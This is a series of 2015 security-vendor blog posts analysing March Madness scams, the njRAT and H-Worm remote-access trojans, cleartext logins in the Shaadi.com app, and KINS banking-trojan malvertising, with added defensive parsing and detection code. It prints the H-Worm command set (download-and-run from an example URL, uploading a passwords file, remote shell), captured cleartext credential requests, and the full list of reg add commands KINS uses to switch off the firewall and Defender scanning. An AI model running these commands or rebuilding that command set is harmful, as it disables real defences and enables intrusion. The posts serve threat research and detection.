Friday, March 20, 2015

March Madness Ads, Scams, and Malware

Introduction

March Madness is officially upon us, with the last games of the round of 64 taking place today. As is usual with events that have such a level of interest, bad actors across the internet will be trying to get their cut of the action through topical spam advertising and phishing as well as search engine poisoning to draw ad revenue and in some cases, deliver malicious software. Though it is still early in the cycle of March Madness interest, we have seen a bit of everything: malware purporting to be NCAA bracket templates, a rash of ad-filled sites running March Madness related SEO campaigns, and the usual complement of shady streaming sites promising live streams of the tournament games (with some delivering a nasty surprise).

NCAA Tournament related traffic shows a sharp uptick as the games began.


NCAA Bracket Download Leads to Malware

While reviewing some of the tournament-related security blocks, we spotted an interesting file download attempt. It's not clear if the original click was derived from a search, but the primary link purports to be a zipped PDF file that can be used to create personalized brackets. The link ultimately directs to an unwanted EXE signed by the Ukrainian publisher BERSHNET LLC (whose history is well documented on HerdProtect).

The downloaded file features a valid Authenticode Certificate.

The binary features an unusual number of protections against analysis for what appears to be simple adware. At this time, we have not fully explored the capabilities of the binary, but analysis shows that the sample gathers system information and sends it to a CloudFlare-hosted command & control server.

HTTP check-in activity includes POSTing system information.

Fake .tk Blogs Generate Ad Revenue and Expose Users

Numerous ad-filled and auto-generated blogs have been popping up to take advantage of unwary search-engine users looking for bracket templates and related web-searches. While we have not seen any overtly malicious behavior on these sites, they represent a potential threat against the unwary searcher.


Auto-generated blogs taking advantage of popular search terms.

An interesting trend among these sites is the use of the free country-code TLD .tk. This isn't too surprising, since the use of free domains is similar to the use of a dynamic DNS service, but the .tk TLD is slightly less conspicuous than no-ip.com or other common alternatives.

Streaming Scams Deliver Malware

Similar to sites offering bracket templates and insights on the match-ups, a large number of sites promising the ability to stream NCAA games have popped up to capture search traffic and generate ad revenue. Unlike the SEO blogs, we have spotted -- and blocked -- malicious downloads related to tournament streams.


Numerous scam sites are found among the top Google hits.
Fake streaming site is filled with ads and fake plug-in install prompts.
Download page for fake plug-in emulates Adobe look and feel.

Although this binary does not initially appear as sophisticated as the fake-bracket sample above, it downloads two supplemental encrypted files: one large binary blob and one base64-encoded text file. Further analysis is needed to enumerate all functionality, but the malware can be observed collecting system information and sending it to a remote server.

Post-infection activity downloads another binary and POSTs system information.

It should be noted that the NCAA has put tight restrictions on streaming the tournament: apart from the first round, streaming the games requires a pay-TV subscription.

Conclusion

All of these examples should highlight the diversity of threats that latch on to the popularity of March Madness. We would like to advise the readers to exercise caution when doing searches or clicking on links related to March Madness.


Zscaler ThreatLabZ has deployed multiple layers of protection against these scams, safeguarding the users even when they are tricked into clicking a nefarious link.

njRAT & H-Worm variant infections continue to rise

Introduction

The njRAT Trojan, also known as Bladabindi, is a Remote Access Tool (RAT) that was first seen in 2013 and has been extremely prevalent in the Middle East region. njRAT was developed using Microsoft's .NET framework and, like many other RATs, provides complete control of the infected system and delivers an array of features to the remote attacker. We have seen attackers leveraging popular gaming and software application cracks and keygens as the lure to infect end users.

There have been many variants of njRAT. H-Worm, also known as Houdini, is one of the most popular variants and was reportedly used in attacks against the international energy sector. In this blog we will provide a brief overview of njRAT and H-Worm as well as an analysis of the H-Worm activity we've seen over the past few months.

njRAT

The njRAT Trojan remains one of the most successful RATs in the wild because of the widespread online support and tutorials available to cyber criminals. A variety of .NET obfuscation tools make detection difficult for antivirus solutions and hinder analysis by security researchers. njRAT utilizes dynamic DNS for its command and control (C2) servers and communicates using a custom TCP protocol over a configurable port.

The C&C callback from the infected system includes the following information:
  • Bot identifier (derived from a configurable string in the builder and the volume serial number)
  • Computer name (Base64 encoded)
  • Operating system information
  • Existence of an attached webcam (Yes/No)
  • Bot version
  • Country code
  • Title of the active process window
Below is a sample C&C message:

253 ll|'|'|TW9pXzUwRkFBNTQw|'|'|247525|'|'|Win7 64Bit|'|'|79-11-30|'|'||'|'|Win7 Enterprise SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|QWRtaW5pc3RyYXRvcjogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlIC0gYzpcUHl0aG9uMjdccHl0aG9uLmV4ZSAgc2ltcGxlX3NvY2tldF9zZXJ2ZXIucHkA|'|'|

Decoded Base64 string #1 (botID_volume-serial-number): Moi_50FAA540
Decoded Base64 string #2 (currently focused window): Administrator: C:\Windows\system32\cmd.exe - 
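The following decoder is an added example (not code from the original post): it splits a check-in on the |'|'| delimiter, base64-decodes the fields that carry text, and exposes a cheap payload-shape test a network detection could reuse. Reading the leading number as a message-length prefix, and the meaning of field positions beyond the two the post decodes, are assumptions.

```python
import base64
import binascii
import re

# njRAT separates check-in fields with the literal token |'|'| (shown in the post's sample).
DELIM = "|'|'|"

# The sample check-in from the post, reproduced as the test input.
SAMPLE = (
    "253 ll|'|'|TW9pXzUwRkFBNTQw|'|'|247525|'|'|Win7 64Bit|'|'|79-11-30|'|'||'|'|"
    "Win7 Enterprise SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|"
    "QWRtaW5pc3RyYXRvcjogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlIC0gYzpcUHl0aG9uMjdc"
    "cHl0aG9uLmV4ZSAgc2ltcGxlX3NvY2tldF9zZXJ2ZXIucHkA|'|'|"
)

B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_if_base64(field):
    """Return the decoded text when `field` is well-formed base64 yielding printable ASCII, else None.

    Length and alphabet checks come first, so short numeric fields such as '247525' are left alone.
    """
    if len(field) < 8 or len(field) % 4 or not B64_CHARS.match(field):
        return None
    try:
        raw = base64.b64decode(field, validate=True)
        text = raw.rstrip(b"\x00").decode("ascii")   # the window title carries a trailing NUL
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def is_njrat_checkin(payload):
    """Cheap shape test for a detection rule: a numeric prefix followed by at least five delimiters."""
    head = payload.split(DELIM, 1)[0]
    return payload.count(DELIM) >= 5 and head.split(" ", 1)[0].isdigit()


def parse_checkin(payload):
    """Split a check-in into its fields and decode the base64-carried ones.

    Only the two decoded values the post walks through get names (bot id, active window);
    the meaning of the other positions is not asserted because the post does not spell it out.
    """
    if not is_njrat_checkin(payload):
        raise ValueError("payload does not look like an njRAT check-in")
    head, *fields = payload.split(DELIM)
    prefix, _, command = head.partition(" ")   # '253' and 'll'; prefix read as a length (assumption)
    decoded = {}
    for index, field in enumerate(fields):
        text = decode_if_base64(field)
        if text is not None:
            decoded[index] = text
    positions = sorted(decoded)
    return {
        "prefix": int(prefix),
        "command": command,
        "fields": fields,
        "decoded": decoded,
        "bot_id": decoded[positions[0]] if positions else None,
        "active_window": decoded[positions[-1]] if len(positions) > 1 else None,
    }


if __name__ == "__main__":
    info = parse_checkin(SAMPLE)
    for key in ("prefix", "command", "bot_id", "active_window"):
        print(f"{key:14s} {info[key]}")
```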

njRAT allows the remote attacker to perform the following activities on the infected system:
  • File system changes
  • Log keystrokes
  • Download and execute a remote file
  • Remote desktop
  • Webcam access
  • Microphone access
  • Obtain user credentials for multiple applications
  • Reverse command shell
The latest instances of njRAT infections we have seen are for version 0.7d. Below are some screenshots of njRAT's control panel as seen by the attacker:

njRAT C&C control panel

njRAT builder panel

njRAT author information

H-Worm

H-Worm is a VBS (Visual Basic Script) based RAT which we believe is derived from the njRAT source code. H-Worm provides cyber-criminals with controls similar to njRAT's. It also uses dynamic DNS for its C&C servers, but unlike njRAT it uses POST requests and the HTTP User-Agent field to exfiltrate sensitive information from the infected machine.

The C&C communication POST requests typically use the parameters 'cmd' and 'param', as seen in the table below:


H-Worm Bot Command Summary (bot command: description; example; connection URI the bot uses for its reply)
  • execute: executes the VBScript code sent in the response. Example: execute<|>vbscript code (connection URI: none)
  • update: updates the bot code to the provided code (overwrites the existing file). Example: update<|>new vbscript bot code (connection URI: none)
  • uninstall: removes the bot from the victim machine. Example: uninstall (connection URI: none)
  • send: downloads content from a URL and dumps it in a directory. Example: send<|>http://www.example.com/malware.exe<|>c:\ (connection URI: none)
  • site-send: downloads content from a URL and saves it with the specified name. Example: site-send<|>http://www.example.com/script.vbs<|>c:\script.vbs (connection URI: none)
  • recv: uploads a file to the C2 domain. Example: recv<|>C:\Users\User\Documents\passwords.txt (connection URI: POST /is-recving)
  • enum-driver: sends information on the victim's system drives. Example: enum-driver (connection URI: POST /is-enum-driver)
  • enum-faf: sends a directory listing for a given path. Example: enum-faf<|>C:\Users\User\ (connection URI: POST /is-enum-path)
  • enum-process: sends the process listing of the victim's system. Example: enum-process (connection URI: POST /is-enum-process)
  • cmd-shell: runs a command via '%comspec% /c' on the infected host. Example: cmd-shell<|>calc.exe (connection URI: POST /is-cmd-shell)
  • delete: deletes a specified file or folder from the victim's system. Example: delete<|>C:\Users\User\Documents\ (connection URI: none)
  • exit-process: kills the specified process ID via taskkill. Example: exit-process<|>123 (connection URI: none)
  • sleep: sets the number of milliseconds to sleep between 'ready' beacons (default 5000). Example: sleep<|>10000 (connection URI: none)
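As an added example (not the post's own tooling), the code below turns the command table into two defender-side checks: a validating parser for the cmd<|>param responses, and a proxy-log scan keyed on the /is-* check-in URIs. The log line format, the hostnames and the port are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# H-Worm separates a command from its arguments with the literal token <|> (per the post's table).
SEP = "<|>"

# bot command -> (argument count, check-in URI the bot POSTs to for that command, or None),
# transcribed from the H-Worm Bot Command Summary above.
COMMANDS = {
    "execute":      (1, None),
    "update":       (1, None),
    "uninstall":    (0, None),
    "send":         (2, None),
    "site-send":    (2, None),
    "recv":         (1, "/is-recving"),
    "enum-driver":  (0, "/is-enum-driver"),
    "enum-faf":     (1, "/is-enum-path"),
    "enum-process": (0, "/is-enum-process"),
    "cmd-shell":    (1, "/is-cmd-shell"),
    "delete":       (1, None),
    "exit-process": (1, None),
    "sleep":        (1, None),
}

# Check-in URIs a compromised host POSTs to: the set a proxy or IDS rule keys on.
URI_TO_COMMAND = {uri: cmd for cmd, (_, uri) in COMMANDS.items() if uri}


def parse_command(response):
    """Split a raw C&C response body into (command, [args]) and validate it against the table.

    Raises ValueError for an unknown command, a wrong argument count, or a non-numeric
    sleep/exit-process argument.
    """
    cmd, *args = response.split(SEP)
    if cmd not in COMMANDS:
        raise ValueError(f"unknown H-Worm command {cmd!r}")
    expected = COMMANDS[cmd][0]
    if len(args) != expected:
        raise ValueError(f"{cmd} takes {expected} argument(s), got {len(args)}")
    if cmd in ("sleep", "exit-process") and not args[0].isdigit():
        raise ValueError(f"{cmd} argument must be numeric, got {args[0]!r}")
    return cmd, args


def is_valid_command(response):
    """Boolean form of parse_command, for filtering captured response bodies."""
    try:
        parse_command(response)
        return True
    except ValueError:
        return False


# Proxy log line shape assumed for this example: "<timestamp> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def flag_checkins(log_lines):
    """Return (client_ip, uri, command) for every POST whose path is an H-Worm check-in URI."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = urlsplit(m.group("url")).path
        if path in URI_TO_COMMAND:
            hits.append((m.group("src"), path, URI_TO_COMMAND[path]))
    return hits


# Constructed proxy log: one client beaconing to a dynamic-DNS style host on a high port,
# plus a GET to a check-in path that must not be flagged.
SAMPLE_LOG = [
    "2015-03-18T10:02:11Z 10.0.0.12 GET http://www.example.com/index.html 200",
    "2015-03-18T10:02:16Z 10.0.0.12 POST http://c2-host.ddns.example:8081/is-enum-process 200",
    "2015-03-18T10:02:21Z 10.0.0.12 POST http://c2-host.ddns.example:8081/is-recving 200",
    "2015-03-18T10:03:02Z 10.0.0.40 GET http://c2-host.ddns.example:8081/is-cmd-shell 200",
]

if __name__ == "__main__":
    print(parse_command("send<|>http://www.example.com/malware.exe<|>c:\\"))
    for hit in flag_checkins(SAMPLE_LOG):
        print(hit)
```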


The C&C callback from an infected system includes the following information in the User-Agent field:
  • Bot identifier (derived from a configurable string in the builder and the volume serial number)
  • Computer name
  • Username
  • Operating system information
  • Bot version
  • Antivirus information (default value 'nan-av')
  • USB spreading [true/false], with the date obtained from the bot's registry entry
Below are some screenshots of H-Worm's control panel accessible to the attacker, from two different variants:

H-Worm plus version C&C control panel

H-Worm control center [similar to njRAT's Manager]

H-Worm plus version builder panel

H-Worm extended/lite version C&C control panel

We continue to see many new variants of H-Worm popping up in the wild. Below are the version strings from some of the active H-Worm variants we have been tracking in 2015:
  • 2.0
  • 3az version
  • hello
  • KKMM NICE PC
  • mod version
  • plus
  • POUSSIN
  • safa7_22
  • SKY ESP PC
  • spupdate
  • the KR.joker worm
  • underworld final
  • v1.8.3  By AB DELL
  • v1.8.7  By AB DELL
  • worm Of Dz-47
  • WORM OF DZ-47
Below is the geographic distribution of the active Command & Control servers we have observed thus far in 2015:


One of the most popular features of this RAT family is the usage of Dynamic DNS for its Command & Control server communication. We have seen multiple sub-domains from the following Dynamic DNS domains in 2015 being abused by the malware authors for C&C communication:

Conclusion

njRAT & H-Worm variant infections continue to rise, and while this threat is reportedly more prevalent in the Middle East region, we continue to see infections in other parts of the world as well. Despite Microsoft's attempt to disrupt the C&C channel for this notorious RAT back in June 2014, we continue to see the malware authors using various dynamic DNS services for its C&C server communication. It remains one of the most popular and prevalent RATs in the wild today.

Zscaler ThreatLabZ has deployed multiple layers of protection against this threat to ensure that the customers are protected.

Past reports on this threat
http://www.fidelissecurity.com/sites/default/files/FTA_1009-njRAT_Uncovered_rev2.pdf
http://www.fidelissecurity.com/sites/default/files/FTA%201010%20-%20njRAT%20The%20Saga%20Continues.pdf
http://phishme.com/the-return-of-njrat/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/
http://www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middle-east-cybercrime-scene
https://blogs.mcafee.com/mcafee-labs/trail-njrat
https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

Analysis by Deepen Desai & John Mancuso

Tuesday, March 17, 2015

Mobile App Wall of Shame: Shaadi.com


Shaadi.com

Price : Free
Category : Social
Platform : iOS and Android
Updated : Mar. 9, 2015 (Android), Mar. 10, 2015 (iOS)
Version : 4.2.2 (Android), 4.2.1 (iOS)
Size : 8.28 MB (Android), 17.7 MB (iOS)
Language : English
Vendor : People Interactive (I) Pvt. Ltd.

Background:

Shaadi.com is the world's largest matrimonial website, active since 1995. This matrimonial site permits individuals to post their profiles and responses including horoscope, caste, language and religion. Shaadi.com provides applications designed for the two main mobile platforms – iOS and Android.

Application Chart (information retrieved from Appannie & xyo.net):

                            Android        iOS
Global Ranking              15             92
Category Ranking            12 (Social)    24 (Social networking)
Total number of Downloads   ~1 million     ~0.3 million
Rating                      3.9/5          2.7/5

A new user is required to register by providing an email address and a password, along with basic personal details. After registering the account, the user can browse profiles created by others. The application also provides a chat facility.

Vulnerability - Cleartext username/password


Login screen

The current version of the Shaadi.com application has a serious security flaw. It has been verified that both the iOS and Android versions of the application transmit the username and password via HTTP in cleartext. This flaw allows an attacker to capture the credentials sent by a user to the application server and thus compromise the user's account, which may lead to the compromise of the user's personal data. The service also provides premium accounts to paying customers.

The application was tested on both the Android and iOS platforms. The vulnerability has been confirmed on Android (v4.2.2 - latest version, updated on Mar. 9, 2015) and iOS (v4.2.1 - latest version, updated on Mar. 10, 2015).  

Vulnerability in iOS version

When a user tries to register for an account in the Shaadi.com application, an HTTP request is generated. In the request, the userid, password and mobile number of the user are sent in cleartext, as seen below:

Account Registration

http://www.shaadi.com/registration/user/?regmode=app&OS=native-iphone
Method: POST
Host: www.shaadi.com
User-Agent: native-iphone|4.1.0
Request Body: form_referral_url=&form_url=http%3A%2F%2Fwww.shaadi.com%2Fregistration%2Fuser%3Fregmode%3Dapp%26appver%3D4.1.0%26os%3Dnative-iphone%26deviceid%3D---%257C---&form_name=MOB_DR_SEO_REG1&frompage=From+Reg+Page&go=&olmt_home_regpage=&hid_year=&oscode=2&email=fnzscalerlnzscaler%40gmail.com&password1=p%40ssword123&postedby=Self&first_name=fnzscaler&last_name=lnzscaler&gender=Male&day=01&month=01&year=1994&community=No+Religion&mother_tongue=Konkani&countryofresidence=USA&contact_tel_number=Landline+No.

Similarly, when an existing user tries to log in to their account by providing their username and password, these credentials are also sent in cleartext. Below is the traffic capture when a user logs in to an existing account:

Login

http://www.shaadi.com/native-apps2/user/login?email=fnzscalerlnzscaler@gmail.com&password=p@ssword123&appver=4.1.0&os=native-iphone&deviceid=---%7C---
Method: GET
Host: www.shaadi.com
User-Agent: Shaadi/462 CFNetwork/711.1.16 Darwin/14.0.0
Server Response: {"status":"200","data":{"sid":"7B16D793AFF0443EE1320F85EFD1B4C51425446439","abc":"0CE03847FB4B0C981EB552E34E1C96B61425446522|ZSH82845405|","premium":false,"gender":"Male","age":"21","memberstatus":"ToBeScreened","memberlogin":"ZSH82845405","photograph_status":"photo_request","update_available":false,"has_notification":"N","has_chat_notification":"N","content_settings":{"eoi":"Y","acc":"Y","msg":"Y","nf1":"N","dr":"Y"},"display_name":"SH82845405","username":"SH82845405","email":"fnzscalerlnzscaler@gmail.com","use_connect":1,"upgrade_message":"UPGRADE TO PREMIUM","support_telephone":"1860-200-3456","payment_telephone":"1860-200-3456"},"expdt":"20150403002202","banner_images":{"banner_search_results":{"title":"Become a Premium Member & connect directly via","subtitle":"EMAIL, CHAT & PHONE","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_search_results_male_free_high.png"},"banner_accepted":{"title":"Upgrade to Premium & start chatting with your Accepted Members!","subtitle":"","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_accepted_free.png"},"banner_inbox_single":{"title":"1 Member like your profile!","subtitle":"Become a Premium member & write back to them today","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_inbox_single_male_free_high.png"},"banner_inbox_multiple":{"title":"#count# Members like your profile!","subtitle":"Become a Premium member & write back to them today","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_inbox_multiple_male_free_high.png"}}} 

Vulnerability in Android version

Account Registration

http://www.shaadi.com/registration/user/?regmode=app&OS=native-android
Method: POST
Host: www.shaadi.com
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; Nexus 7 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Safari/537.36
Request Body: form_referral_url=&form_url=http%3A%2F%2Fwww.shaadi.com%2Fregistration%2Fuser%3Fregmode%3Dapp%26os%3Dnative-android%26deviceid%3D--%7C--%26appver%3D4.1.3&form_name=MOB_DR_SEO_REG1&frompage=From+Reg+Page&go=&olmt_home_regpage=&hid_year=&oscode=1&email=vulapps%40zscaler.com&password1=p%40ssword1234&postedby=Self&first_name=fnzscaler&last_name=lnzscaler&gender=Male&day=10&month=10&year=1985&community=Spiritual+-+not+religious&mother_tongue=Marathi&countryofresidence=USA&contact_tel_number=Landline+No.

Login

http://www.shaadi.com/registration/user/login-submit
Method: POST
Host: www.shaadi.com
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; Nexus 7 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Safari/537.36
Request Body: go=&email=vulapps%40zscaler.com&password=p%40ssword123&autologin=0&autologin=Y

ZAP analysis:

ZAP in action - Android
ZAP in action - iOS

Conclusion

The list of mobile applications in Google Play and the iTunes App Store that send out sensitive information in cleartext continues to grow. Therefore, it is extremely important to keep separate passwords for different applications and never use the password of your financial applications anywhere else.

Credit: Lakshmi Devi.

Wednesday, March 11, 2015

Malvertising targeting European transit users

Malvertising has been an active and growing attack vector for delivering malicious payloads to unsuspecting users. ThreatLabZ recently uncovered a malvertising campaign targeting European transit users; the end payload appears to be the KINS variant of Zeus.

The KINS (Kasper Internet Non-Security) variant of Zeus is a banking Trojan that has been prevalent since 2011. KINS is a crimekit developed from the leaked ZeuS source code to replace the aging Citadel Trojan, which was used to harvest credentials from victim PCs.

ThreatLabZ has seen many instances of this threat being downloaded in the wild with very low AV detection. The malicious dropper payload is downloaded from URLs that match the following pattern:

[domain]:[nonstandard port]/[var1].php?[var2]=n&[var3]=n&[var4]=n&[var5]=n&[var6]=n&[var7]=n&[var8]=n
n = random 1- to 4-digit number

Some examples of this activity are seen below:
This variant of the KINS crimekit is spreading through malvertising attempts targeting European users. All the download attempts we observed have two things in common:
  1. Victims were visiting a site related to European transit
  2. Victims were redirected to the final destination through an advertising network

Sample infection cycle URLs

The malware masquerades as a PDF document to lure an unsuspecting user into opening the file. Upon execution, it creates a copy of itself in the %Application Data% directory, deletes the original copy and injects into the system explorer.exe process to perform a variety of actions. The dropped file on the infected system can be found at one of the following two locations:
  • %Application Data%\svchoste.exe [Windows XP]
  • %Application Data%\Roaming\[random 4-5 character string]\[random 4-5 character string].exe  [Windows 7]

The bot further makes multiple system registry modifications to evade detection:
  • Microsoft security center - disable update notifications, disable antimalware scan:
reg add HKLM\SOFTWARE\Microsoft\Security Center /v UpdatesDisableNotify /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallOverride /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallDisableNotify /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusOverride /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t reg_dword /d 1 /f
  • Windows firewall settings - Allow exceptions, disable notifications, disable the firewall:
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DisableNotifications /t reg_dword /d 1 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DoNotAllowExceptions /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DisableNotifications /t reg_dword /d 1 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DisableNotifications /t reg_dword /d 1 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v EnableFirewall /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v EnableFirewall /t reg_dword /d 0 /f
  • Windows Defender & AntiMalware settings - Exclude malware processes, injected system processes and certain file types from scanning:
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v svchost.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v consent.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v rundll32.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v spoolsv.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v explorer.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v rgjdu.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v afwqs.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  " /v *.tmp /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  " /v *.dll /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  " /v *.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v svchost.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v consent.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v rundll32.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v spoolsv.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v explorer.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v rgjdu.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v afwqs.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  " /v *.tmp /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  " /v *.dll /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  " /v *.exe /t  REG_DWORD /d 0
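An added example (not code from the post) that audits the text of a 'reg export' for the changes listed above: it parses the .reg format, normalises hive aliases and case, and reports Security Center and firewall values that match the bot's settings plus any Windows Defender or Microsoft Antimalware exclusion. The export content is constructed for the example.

```python
import re

# Key paths the bot touches, lowercased and with the HKLM alias (from the reg add commands above).
SECURITY_CENTER = r"hklm\software\microsoft\security center"
FIREWALL_POLICY = r"hklm\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy"
EXCLUSION_ROOTS = (r"hklm\software\microsoft\windows defender\exclusions",
                   r"hklm\software\microsoft\microsoft antimalware\exclusions")

# (key path, value name) -> DWORD data that matches the bot's change.
WEAKENING_VALUES = {(SECURITY_CENTER, name): 1 for name in (
    "updatesdisablenotify", "firewalloverride", "firewalldisablenotify",
    "antivirusoverride", "antivirusdisablenotify")}
for profile in ("domainprofile", "publicprofile", "standardprofile"):
    WEAKENING_VALUES[(FIREWALL_POLICY + "\\" + profile, "disablenotifications")] = 1
    WEAKENING_VALUES[(FIREWALL_POLICY + "\\" + profile, "donotallowexceptions")] = 0
    WEAKENING_VALUES[(FIREWALL_POLICY + "\\" + profile, "enablefirewall")] = 0

HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Parse the text of a .reg export into {key_path: {value_name: int}} for DWORD values.

    Key paths and value names are lowercased and the hive shortened to its alias, so lookups are
    case-insensitive like the registry itself. Only DWORDs are kept; the bot writes nothing else.
    """
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key = KEY_RE.match(line)
        if key:
            hive, _, rest = key.group(1).partition("\\")
            current = HIVE_ALIASES.get(hive.lower(), hive.lower()) + "\\" + rest.lower().rstrip()
            keys.setdefault(current, {})
            continue
        value = VALUE_RE.match(line)
        if current and value:
            keys[current][value.group(1).lower()] = int(value.group(2), 16)
    return keys


def audit(keys):
    """List Security Center / firewall values matching the bot's settings and every AV exclusion present."""
    findings = []
    for (key, name), bad in WEAKENING_VALUES.items():
        if keys.get(key, {}).get(name) == bad:
            findings.append(f"{key}\\{name} = {bad}")
    for key, values in keys.items():
        if key.startswith(EXCLUSION_ROOTS):
            findings.extend(f"exclusion {key}\\{name}" for name in values)
    return sorted(findings)


# Constructed export with some of the bot's changes, one untouched value and one unrelated key.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify"=dword:00000001
"AntiVirusOverride"=dword:00000001
"AntiVirusDisableNotify"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000
"DoNotAllowExceptions"=dword:00000000
"DisableNotifications"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"explorer.exe"=dword:00000000
"rgjdu.exe"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
"*.exe"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Benign]
"Setting"=dword:00000001
"""

if __name__ == "__main__":
    # A real export is UTF-16 text: open(path, encoding="utf-16").read() before passing it in.
    for finding in audit(parse_reg_export(SAMPLE_EXPORT)):
        print(finding)
```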

The injected code in the system explorer process is responsible for performing Command & Control (C&C) communication. It also opens a port (TCP 36139) on the victim machine, listening for incoming connections.

Listening on TCP port 36139

There are two common network-level indicators to identify a compromised node:
  • A POST transaction with the following hard-coded User-Agent string:

Mozilla/5.0 (Windows; Windows NT 7.1; en; rv:1.9.6.8) Gecko/20120122 Firefox/9.1.2

  • A POST request made to a URI like '/common/link.php'.


POST encrypted information to C&C server


The bot encrypts the system information in the following format and sends it via the above POST request to the C&C server:

v=%d&s=%d&h=%d&un=%s&o=%d&c=%d&ip=%s&sys=%s&uid=%d&w=%d&ftp=
